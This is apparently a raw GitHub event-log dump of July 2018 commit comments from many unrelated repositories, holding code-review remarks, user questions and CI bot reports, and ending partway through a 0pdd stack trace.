{"id":"7998366930","type":"CommitCommentEvent","actor":{"login":"pmario"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":29788073,"position":10,"line":10,"path":"plugins/tiddlywiki/comments/readme.tid","commit_id":"acaa07a964a004759ddb8fb755484918b3322815","created_at":"2018-07-21T09:56:19Z","updated_at":"2018-07-21T09:56:19Z","author_association":"CONTRIBUTOR","body":"Should `IsReadOnly` be `yes` to display the buttons? I'm confused!"}},"created_at":"2018-07-21T09:56:19Z"}
{"id":"7998370092","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29788076,"position":null,"line":null,"path":null,"commit_id":"93a2f397c6f0e5f35ffe0f7e19c0379ffbbf5b54","created_at":"2018-07-21T09:59:16Z","updated_at":"2018-07-21T09:59:16Z","author_association":"MEMBER","body":"nametags are a pain in the ass... I rolled this release without a fix for them so I could get rid of people pestering me about 1.5. Currently we're still looking for a solution that doesn't involve changing the player's username."}},"created_at":"2018-07-21T09:59:16Z"}
{"id":"7998370740","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29788077,"position":18,"line":16,"path":"lesson1/triangle.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-21T09:59:52Z","updated_at":"2018-07-21T09:59:52Z","author_association":"NONE","body":"Просто записать условное выражение в переменную\r\n```\r\nrectangular = sides[2]**2 == sides[1]**2 + sides[0]**2\r\n```"}},"created_at":"2018-07-21T09:59:52Z"}
{"id":"7999371754","type":"CommitCommentEvent","actor":{"login":"spenserhale"},"repo":{"name":"spenserhale/scientist-psr3-journal"},"payload":{"comment":{"id":29790490,"position":17,"line":16,"path":"composer.json","commit_id":"26fc513431710561c9d456d6e79920c5a1acd1ac","created_at":"2018-07-22T00:00:19Z","updated_at":"2018-07-22T00:00:19Z","author_association":"OWNER","body":"Hey Nikko,\r\nThank you for writing the original package. My goal was not to discredit your work. However, I had a deadline to get the project done by Friday, so I only did bare changes to get it to work. I agree I should have left original author until I had time to document author change properly.\r\n\r\nI do always try to include the original author. Now that I had a chance, here is the next readme for the next release:\r\nhttps://github.com/spenserhale/scientist-psr3-journal/blob/5e684f87bc00216a799bd54a141b6af009b7468d/README.md\r\n\r\nPlease view another library I also forked:\r\nhttps://github.com/spenserhale/php-indefinite-article\r\n\r\nYou will notice I documented all the original authors without asking. So again, never meant to upset you.  I just ran out of time."}},"created_at":"2018-07-22T00:00:19Z"}
{"id":"7999372778","type":"CommitCommentEvent","actor":{"login":"e110110eee"},"repo":{"name":"e110110eee/encourageQuote"},"payload":{"comment":{"id":29790494,"position":null,"line":null,"path":null,"commit_id":"ca71bc64798f307bdb6ed31b97708b207f242bd7","created_at":"2018-07-22T00:01:17Z","updated_at":"2018-07-22T00:01:17Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-22T00:01:17Z"}
{"id":"7999373205","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790496,"position":null,"line":null,"path":null,"commit_id":"aacd2f33297a1a17b13f3a2dd152997d1df86915","created_at":"2018-07-22T00:01:45Z","updated_at":"2018-07-22T00:01:45Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3169 "}},"created_at":"2018-07-22T00:01:45Z"}
{"id":"7999373250","type":"CommitCommentEvent","actor":{"login":"crackfoo"},"repo":{"name":"duality-solutions/yiimp"},"payload":{"comment":{"id":29790497,"position":null,"line":null,"path":null,"commit_id":"464e6511bd6b21043d43519a48476fcf53038f85","created_at":"2018-07-22T00:01:48Z","updated_at":"2018-07-22T00:01:48Z","author_association":"NONE","body":"mining with this code on DYN wallet gives:\r\n\r\n18-07-21 23:58:37 ERROR: CheckProofOfWork(): hash doesn't match nBits\r\n2018-07-21 23:58:37 ERROR: CheckBlockHeader(): proof of work failed\r\n2018-07-21 23:58:37 ERROR: ProcessNewBlock: AcceptBlock FAILED\r\n2018-07-21 23:58:39 ERROR: CheckProofOfWork(): hash doesn't match nBits\r\n2018-07-21 23:58:39 ERROR: CheckBlockHeader(): proof of work failed\r\n2018-07-21 23:58:39 ERROR: ProcessNewBlock: AcceptBlock FAILED\r\n2018-07-21 23:58:39 ERROR: CheckProofOfWork(): hash doesn't match nBits\r\n2018-07-21 23:58:39 ERROR: CheckBlockHeader(): proof of work failed\r\n2018-07-21 23:58:39 ERROR: ProcessNewBlock: AcceptBlock FAILED\r\n\r\nAny clues why?"}},"created_at":"2018-07-22T00:01:48Z"}
{"id":"7999376207","type":"CommitCommentEvent","actor":{"login":"AmyMendelsohn"},"repo":{"name":"cornerofsound/cornerofsound.github.io"},"payload":{"comment":{"id":29790501,"position":null,"line":null,"path":null,"commit_id":"a2a2521ac03b651fc01c9845f408203386768203","created_at":"2018-07-22T00:05:01Z","updated_at":"2018-07-22T00:05:01Z","author_association":"COLLABORATOR","body":"* contact page does not need scrolling\r\n* about card fills screen\r\n\r\n\r\nStill to do:\r\n* fix contact and about card centering\r\n"}},"created_at":"2018-07-22T00:05:01Z"}
{"id":"7999377716","type":"CommitCommentEvent","actor":{"login":"KenCherline"},"repo":{"name":"KenCherline/nyt"},"payload":{"comment":{"id":29790506,"position":null,"line":null,"path":null,"commit_id":"fa7bb239cec4df8ad3ca2c3d79cf65790fd7bb47","created_at":"2018-07-22T00:06:38Z","updated_at":"2018-07-22T00:06:38Z","author_association":"OWNER","body":"My first repository"}},"created_at":"2018-07-22T00:06:38Z"}
{"id":"7999378717","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-cli"},"payload":{"comment":{"id":29790512,"position":null,"line":null,"path":null,"commit_id":"2571a387fe2667c406cf9a1224e6935547fc8af7","created_at":"2018-07-22T00:07:46Z","updated_at":"2018-07-22T00:07:46Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\ntaskId LykP9QrWS_m4N2y-4r8A-Q already used by another task.\nThis could be the result of faulty idempotency!\nExisting task definition was:\n ```js\n{\n  \"provisionerId\": \"aws-provisioner-v1\",\n  \"workerType\": \"github-worker\",\n  \"schedulerId\": \"taskcluster-github\",\n  \"taskGroupId\": \"FAewwUA3Tk6xiyoHcXT2yw\",\n  \"dependencies\": [],\n  \"requires\": \"all-completed\",\n  \"routes\": [],\n  \"priority\": \"lowest\",\n  \"retries\": 5,\n  \"created\": \"2018-07-22T00:07:45.870Z\",\n  \"deadline\": \"2018-07-22T01:07:45.870Z\",\n  \"expires\": \"2019-07-22T01:07:45.870Z\",\n  \"scopes\": [],\n  \"payload\": {\n    \"maxRunTime\": 3600,\n    \"image\": \"golang:1.8\",\n    \"command\": [\n      \"/bin/bash\",\n      \"-c\",\n      \"mkdir -p  /go/src/github.com/taskcluster/taskcluster-cli && cd  /go/src/github.com/taskcluster/taskcluster-cli && git init && git fetch git://github.com/owlishDeveloper/taskcluster-cli.git bug1476856 && git checkout 2571a387fe2667c406cf9a1224e6935547fc8af7 && make lint\"\n    ]\n  },\n  \"metadata\": {\n    \"name\": \"TaskCluster GitHub Lint Checks\",\n    \"description\": \"Linting\",\n    \"owner\": \"owlishDeveloper@users.noreply.github.com\",\n    \"source\": \"https://api.github.com/repos/taskcluster/taskcluster-cli\"\n  },\n  \"tags\": {},\n  \"extra\": {}\n}\n```\nThis request tried to define:\n ```js\n{\n  \"provisionerId\": \"aws-provisioner-v1\",\n  \"workerType\": \"github-worker\",\n  \"created\": \"2018-07-22T00:07:45.870Z\",\n  \"deadline\": \"2018-07-22T01:07:45.870Z\",\n  \"payload\": {\n    \"maxRunTime\": 3600,\n    \"image\": \"golang:1.8\",\n    \"command\": [\n      \"/bin/bash\",\n      \"-c\",\n      \"mkdir -p  /go/src/github.com/taskcluster/taskcluster-cli && cd  /go/src/github.com/taskcluster/taskcluster-cli && git init && git fetch git://github.com/owlishDeveloper/taskcluster-cli.git bug1476856 && git checkout 2571a387fe2667c406cf9a1224e6935547fc8af7 && make test\"\n    ],\n    \"artifacts\": {\n      \"public/taskcluster-linux\": null,\n      \"path\": \"/go/src/github.com/taskcluster/taskcluster-cli/taskcluster\",\n      \"type\": \"file\"\n    }\n  },\n  \"metadata\": {\n    \"name\": \"TaskCluster GitHub Lint Checks\",\n    \"description\": \"Linting\",\n    \"owner\": \"owlishDeveloper@users.noreply.github.com\",\n    \"source\": \"https://api.github.com/repos/taskcluster/taskcluster-cli\"\n  },\n  \"taskGroupId\": \"FAewwUA3Tk6xiyoHcXT2yw\",\n  \"schedulerId\": \"taskcluster-github\",\n  \"dependencies\": [],\n  \"requires\": \"all-completed\",\n  \"routes\": [],\n  \"priority\": \"lowest\",\n  \"retries\": 5,\n  \"scopes\": [],\n  \"tags\": {},\n  \"extra\": {},\n  \"expires\": \"2019-07-22T01:07:45.870Z\"\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  RequestConflict\n* statusCode: 409\n* time:       2018-07-22T00:07:46.936Z\n\n</details>"}},"created_at":"2018-07-22T00:07:46Z"}
{"id":"7999381366","type":"CommitCommentEvent","actor":{"login":"angerman"},"repo":{"name":"dezgeg/nixpkgs"},"payload":{"comment":{"id":29790513,"position":null,"line":null,"path":null,"commit_id":"f3758258b8895508475caf83e92bfb236a27ceb9","created_at":"2018-07-22T00:10:43Z","updated_at":"2018-07-22T00:10:43Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-22T00:10:43Z"}
{"id":"7999383464","type":"CommitCommentEvent","actor":{"login":"Freso"},"repo":{"name":"Modorganizer2/modorganizer-umbrella"},"payload":{"comment":{"id":29790515,"position":null,"line":null,"path":null,"commit_id":"2be2b2630f43226a4c362e24fb413ece557cf36d","created_at":"2018-07-22T00:13:12Z","updated_at":"2018-07-22T00:13:12Z","author_association":"NONE","body":"This probably also be removed from the \"Sebastian Herbord\" since all their rights are also not reserved (the code being available under the GPL…"}},"created_at":"2018-07-22T00:13:12Z"}
{"id":"7999387355","type":"CommitCommentEvent","actor":{"login":"curtcorum"},"repo":{"name":"mrirecon/bart"},"payload":{"comment":{"id":29790526,"position":null,"line":null,"path":null,"commit_id":"fbc2e46497d3fb1eb910e054d82b54e65bc4748d","created_at":"2018-07-22T00:17:34Z","updated_at":"2018-07-22T00:17:34Z","author_association":"NONE","body":"This seems to break ox-bart build (as it did for cuda)?\r\n\r\n[https://github.com/mrirecon/ox-bart](url)"}},"created_at":"2018-07-22T00:17:34Z"}
{"id":"7999388851","type":"CommitCommentEvent","actor":{"login":"andrewipark"},"repo":{"name":"dguzek/Simply-Love-SM5"},"payload":{"comment":{"id":29790527,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-22T00:19:16Z","updated_at":"2018-07-22T00:19:16Z","author_association":"CONTRIBUTOR","body":"Wait, the mine value is actually 0.0065 seconds = 6.5 ms, not 0.065 s = 65 ms?"}},"created_at":"2018-07-22T00:19:16Z"}
{"id":"7999389817","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29790528,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-22T00:20:24Z","updated_at":"2018-07-22T00:20:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T00:20:24Z"}
{"id":"7999400688","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29790557,"position":10,"line":144,"path":"src/supertux/game_session_recorder.cpp","commit_id":"8a8b67d2646dd4ddec5f6efcc628fc75d1dbfbf7","created_at":"2018-07-22T00:32:30Z","updated_at":"2018-07-22T00:32:30Z","author_association":"CONTRIBUTOR","body":"Now these aren't initialized to anything, not that the code below seems to care about failure either.\r\n\r\nIf you'd like to keep things below even more succinct you could even write `playback_demo_stream->get(left)->get(right)->get(up)->get(down)->get(jump)->get(action);`."}},"created_at":"2018-07-22T00:32:30Z"}
{"id":"7999402303","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29790560,"position":null,"line":null,"path":null,"commit_id":"6fea6c4fec17a36939e657b4acabcb534c3a902a","created_at":"2018-07-22T00:34:24Z","updated_at":"2018-07-22T00:34:24Z","author_association":"CONTRIBUTOR","body":"Мм, я так из движка вирус сделал, который умудрялся убивать процессы винды. Меняй. "}},"created_at":"2018-07-22T00:34:24Z"}
{"id":"7999406036","type":"CommitCommentEvent","actor":{"login":"hrudaya21"},"repo":{"name":"hrudaya21/EDA"},"payload":{"comment":{"id":29790561,"position":null,"line":null,"path":null,"commit_id":"40d8e18278b33d9e5599f20e367da0836a03e3aa","created_at":"2018-07-22T00:38:36Z","updated_at":"2018-07-22T00:38:36Z","author_association":"OWNER","body":"Column_Data_Analysis"}},"created_at":"2018-07-22T00:38:36Z"}
{"id":"7999407381","type":"CommitCommentEvent","actor":{"login":"Fabio-LaF"},"repo":{"name":"Fabio-LaF/SortingAlgorithms"},"payload":{"comment":{"id":29790563,"position":null,"line":null,"path":null,"commit_id":"3270853785899c180a27995c63970bcce8e9b9d2","created_at":"2018-07-22T00:40:00Z","updated_at":"2018-07-22T00:40:00Z","author_association":"OWNER","body":"Updated the type of the .elements input"}},"created_at":"2018-07-22T00:40:00Z"}
{"id":"7999407774","type":"CommitCommentEvent","actor":{"login":"ICEYSELF"},"repo":{"name":"ckx-lang/ckxc-v2-proto"},"payload":{"comment":{"id":29790565,"position":4,"line":64,"path":"fuckyou/src/cn/ckxily/ckxc/lex/Lexer.kt","commit_id":"d4b1bc0074e04fb045d8dd0bd708463937e4995e","created_at":"2018-07-22T00:40:21Z","updated_at":"2018-07-22T00:40:21Z","author_association":"CONTRIBUTOR","body":"If a user necessities an integer which int64 is not capable, the behaviour is undefined."}},"created_at":"2018-07-22T00:40:21Z"}
{"id":"7999409529","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29790569,"position":5,"line":100,"path":"src/math/random_generator.cpp","commit_id":"52567b63a237c5993665edcc8accb54821940401","created_at":"2018-07-22T00:42:21Z","updated_at":"2018-07-22T00:42:21Z","author_association":"CONTRIBUTOR","body":"While this seems like the easy fix, normally functions ending with f tend to return float (as this one did at least in range of values). Also most (if not all) users of this function seem to convert it back to float. Maybe it would be better to actually change this one to do floats. It also just produces 31 bits of randomness (in a long, which could be interesting on 64-bit Windows).\r\n\r\nActually I have been wondering whether or not most of this file could be replaced by some usage of C++11's `<random>`.\r\n\r\n"}},"created_at":"2018-07-22T00:42:21Z"}
{"id":"7999414770","type":"CommitCommentEvent","actor":{"login":"BurntSushi"},"repo":{"name":"BurntSushi/ripgrep"},"payload":{"comment":{"id":29790577,"position":null,"line":null,"path":null,"commit_id":"090216cf002a579c987df76125fcdcb97478d48e","created_at":"2018-07-22T00:48:43Z","updated_at":"2018-07-22T00:48:43Z","author_association":"OWNER","body":"@c-blake Hmm. Thank you for pointing out that snafu. I might just add a `--no-pre` flag then."}},"created_at":"2018-07-22T00:48:43Z"}
{"id":"7999418271","type":"CommitCommentEvent","actor":{"login":"tedstardev"},"repo":{"name":"MinecraftForge/MCPConfig"},"payload":{"comment":{"id":29790586,"position":18,"line":18,"path":"versions/1.13/inject/mcp/client/Start.java","commit_id":"50ffa321d46955725ac8b3c30820e885aaa2ec8b","created_at":"2018-07-22T00:52:57Z","updated_at":"2018-07-22T00:52:57Z","author_association":"NONE","body":"Using `--assetIndex` as `1.12` instead of `1.13`."}},"created_at":"2018-07-22T00:52:57Z"}
{"id":"7999419975","type":"CommitCommentEvent","actor":{"login":"Fraser-Bell"},"repo":{"name":"Fraser-Bell/yast-fonts"},"payload":{"comment":{"id":29790587,"position":null,"line":null,"path":null,"commit_id":"b565dec57aff7cfb0664ffcb838914311f88e1b2","created_at":"2018-07-22T00:54:59Z","updated_at":"2018-07-22T00:54:59Z","author_association":"OWNER","body":"Probably wrong description, here, should be \"add Gerry Makaro as maintainer\"\r\n"}},"created_at":"2018-07-22T00:54:59Z"}
{"id":"7999422424","type":"CommitCommentEvent","actor":{"login":"tonovarela"},"repo":{"name":"tonovarela/udemy-heroes"},"payload":{"comment":{"id":29790593,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-22T00:57:53Z","updated_at":"2018-07-22T00:57:53Z","author_association":"OWNER","body":"Este es mi villano favorito"}},"created_at":"2018-07-22T00:57:53Z"}
{"id":"7999425679","type":"CommitCommentEvent","actor":{"login":"shubhampant13"},"repo":{"name":"shubhampant13/RobotAnimation"},"payload":{"comment":{"id":29790612,"position":null,"line":null,"path":null,"commit_id":"6c880b71b8fe7c206f12cb92d2cba76bdf70e821","created_at":"2018-07-22T01:01:15Z","updated_at":"2018-07-22T01:01:15Z","author_association":"OWNER","body":"my comment is positive\r\n"}},"created_at":"2018-07-22T01:01:15Z"}
{"id":"7999429147","type":"CommitCommentEvent","actor":{"login":"tienne-B"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29790619,"position":18,"line":18,"path":"tabbycat/notifications/migrations/0002_rename_recipient.py","commit_id":"abce1c2bea9b5a3ca84b4ccf5a32d093df139b7b","created_at":"2018-07-22T01:05:03Z","updated_at":"2018-07-22T01:05:03Z","author_association":"CONTRIBUTOR","body":"Missing the operation to change the verbose name."}},"created_at":"2018-07-22T01:05:03Z"}
{"id":"7999430033","type":"CommitCommentEvent","actor":{"login":"ablodge"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29790620,"position":null,"line":null,"path":null,"commit_id":"28defc5a048a2829d0b58a789318a7b27674697e","created_at":"2018-07-22T01:06:00Z","updated_at":"2018-07-22T01:06:00Z","author_association":"CONTRIBUTOR","body":"Can you try a more recent version? This commit had to do with installing silk. All the static files should be removed in a later commit."}},"created_at":"2018-07-22T01:06:00Z"}
{"id":"7999432907","type":"CommitCommentEvent","actor":{"login":"funkwallace"},"repo":{"name":"funkwallace/ClickGrid"},"payload":{"comment":{"id":29790632,"position":null,"line":null,"path":null,"commit_id":"4c675cecede89afa5e60aa474abafac29550d728","created_at":"2018-07-22T01:09:22Z","updated_at":"2018-07-22T01:09:22Z","author_association":"OWNER","body":"snapMode fixes #6 .\r\nAlso, HIGHLIGHT color adjusted for Connector and Node to slightly brighter orange."}},"created_at":"2018-07-22T01:09:22Z"}
{"id":"7999433917","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790633,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-22T01:10:30Z","updated_at":"2018-07-22T01:10:30Z","author_association":"NONE","body":"develop (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-22T01:10:30Z"}
{"id":"7999434240","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29790635,"position":null,"line":null,"path":null,"commit_id":"4e5c735aa0e4dac9ac5be1f74e670dd15b4c5cdb","created_at":"2018-07-22T01:10:55Z","updated_at":"2018-07-22T01:10:55Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site && pdd -v -f /tmp/20180722-17480-omh1l0 [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site && pdd -v -f /tmp/20180722-17480-omh1l0 [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site\n+ pdd -v -f /tmp/20180722-17480-omh1l0\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site\n213 file(s) found, 56 excluded\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/search/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/catalog/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/catalog/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/catalog/views/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/fixtures/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/refarm_redirects/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/pages/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/images/assets/deer.jpg is a binary file (19044 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/images/assets/gold.jpg is a binary file (45940 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/images/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/tests/ecommerce/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-bg_flat_0_aaaaaa_40x100.png is a binary file (86 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-icons_555555_256x240.png is a binary file (3274 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-icons_ffffff_256x240.png is a binary file (3264 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-icons_444444_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-icons_777620_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-icons_cc0000_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/jstree/40px.png is a binary file (5717 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/jstree/throbber.gif is a binary file (1720 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/jstree/32px.png is a binary file (1562 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/ui-icons_777777_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/generic_admin/front/images/loading.gif is a binary file (1787 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/pages/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/pages/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/pages/management/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/pages/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/images/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/images/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/ecommerce/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/ecommerce/__init__.py is a binary file (1 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/ecommerce/img/02.png is a binary file (32719 bytes)\n/tmp/0pdd20180721-4-1ccfprq/fidals/refarm-site/ecommerce/img/01.png is a binary file (247355 bytes)\nReading SYSADMIN.md...\nReading search/migrations/0001_trigram_search.py...\nReading search/urls.py...\nReading search/search.py...\nReading search/apps.py...\nReading search/views.py...\nPuzzle 85-5b8190cf 0/DEV at search/views.py\nReading search/templates/search/no_results.html...\nReading search/templates/search/results.html...\nReading catalog/templatetags/catalog_extras.py...\nReading catalog/migrations/0003_auto_20160909_0755.py...\nReading catalog/migrations/0005_delete_redundant_models.py...\nReading catalog/migrations/0002_auto_20160829_1731.py...\nReading catalog/migrations/0001_initial.py...\nReading catalog/migrations/0004_merge.py...\nReading catalog/migrations/0003_auto_20160906_1631.py...\nReading catalog/views/catalog.py...\nReading catalog/urls.py...\nReading catalog/models.py...\nReading catalog/apps.py...\nReading catalog/templates/catalog/catalog.html...\nReading catalog/templates/catalog/products_without_content.html...\nReading catalog/templates/catalog/product.html...\nReading catalog/templates/catalog/category.html...\nReading manage.py...\nReading tests/search/test_models.py...\nReading tests/search/urls.py...\nReading tests/search/test_views.py...\nPuzzle 85-01b685cc 0/DEV at tests/search/test_views.py\nReading tests/search/views.py...\nReading tests/migrations/0001_initial.py...\nReading tests/catalog/test_models.py...\nReading tests/catalog/urls.py...\nReading tests/catalog/models.py...\nReading tests/catalog/test_views.py...\nReading tests/catalog/views.py...\nReading tests/management/commands/create_fixtures.py...\nReading tests/fixtures/search.json...\nReading tests/generic_admin/urls.py...\nReading tests/generic_admin/test_views.py...\nReading tests/generic_admin/test_admin_models.py...\nReading tests/urls.py...\nReading tests/static/logo.svg...\nReading tests/refarm_redirects/test_views.py...\nERROR: tests/refarm_redirects/test_views.py; puzzle at line #1; @todo found, but puzzle can't be parsed, most probably because @todo is not followed by a puzzle marker, as this page explains: https://github.com/yegor256/pdd#how-to-format. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in 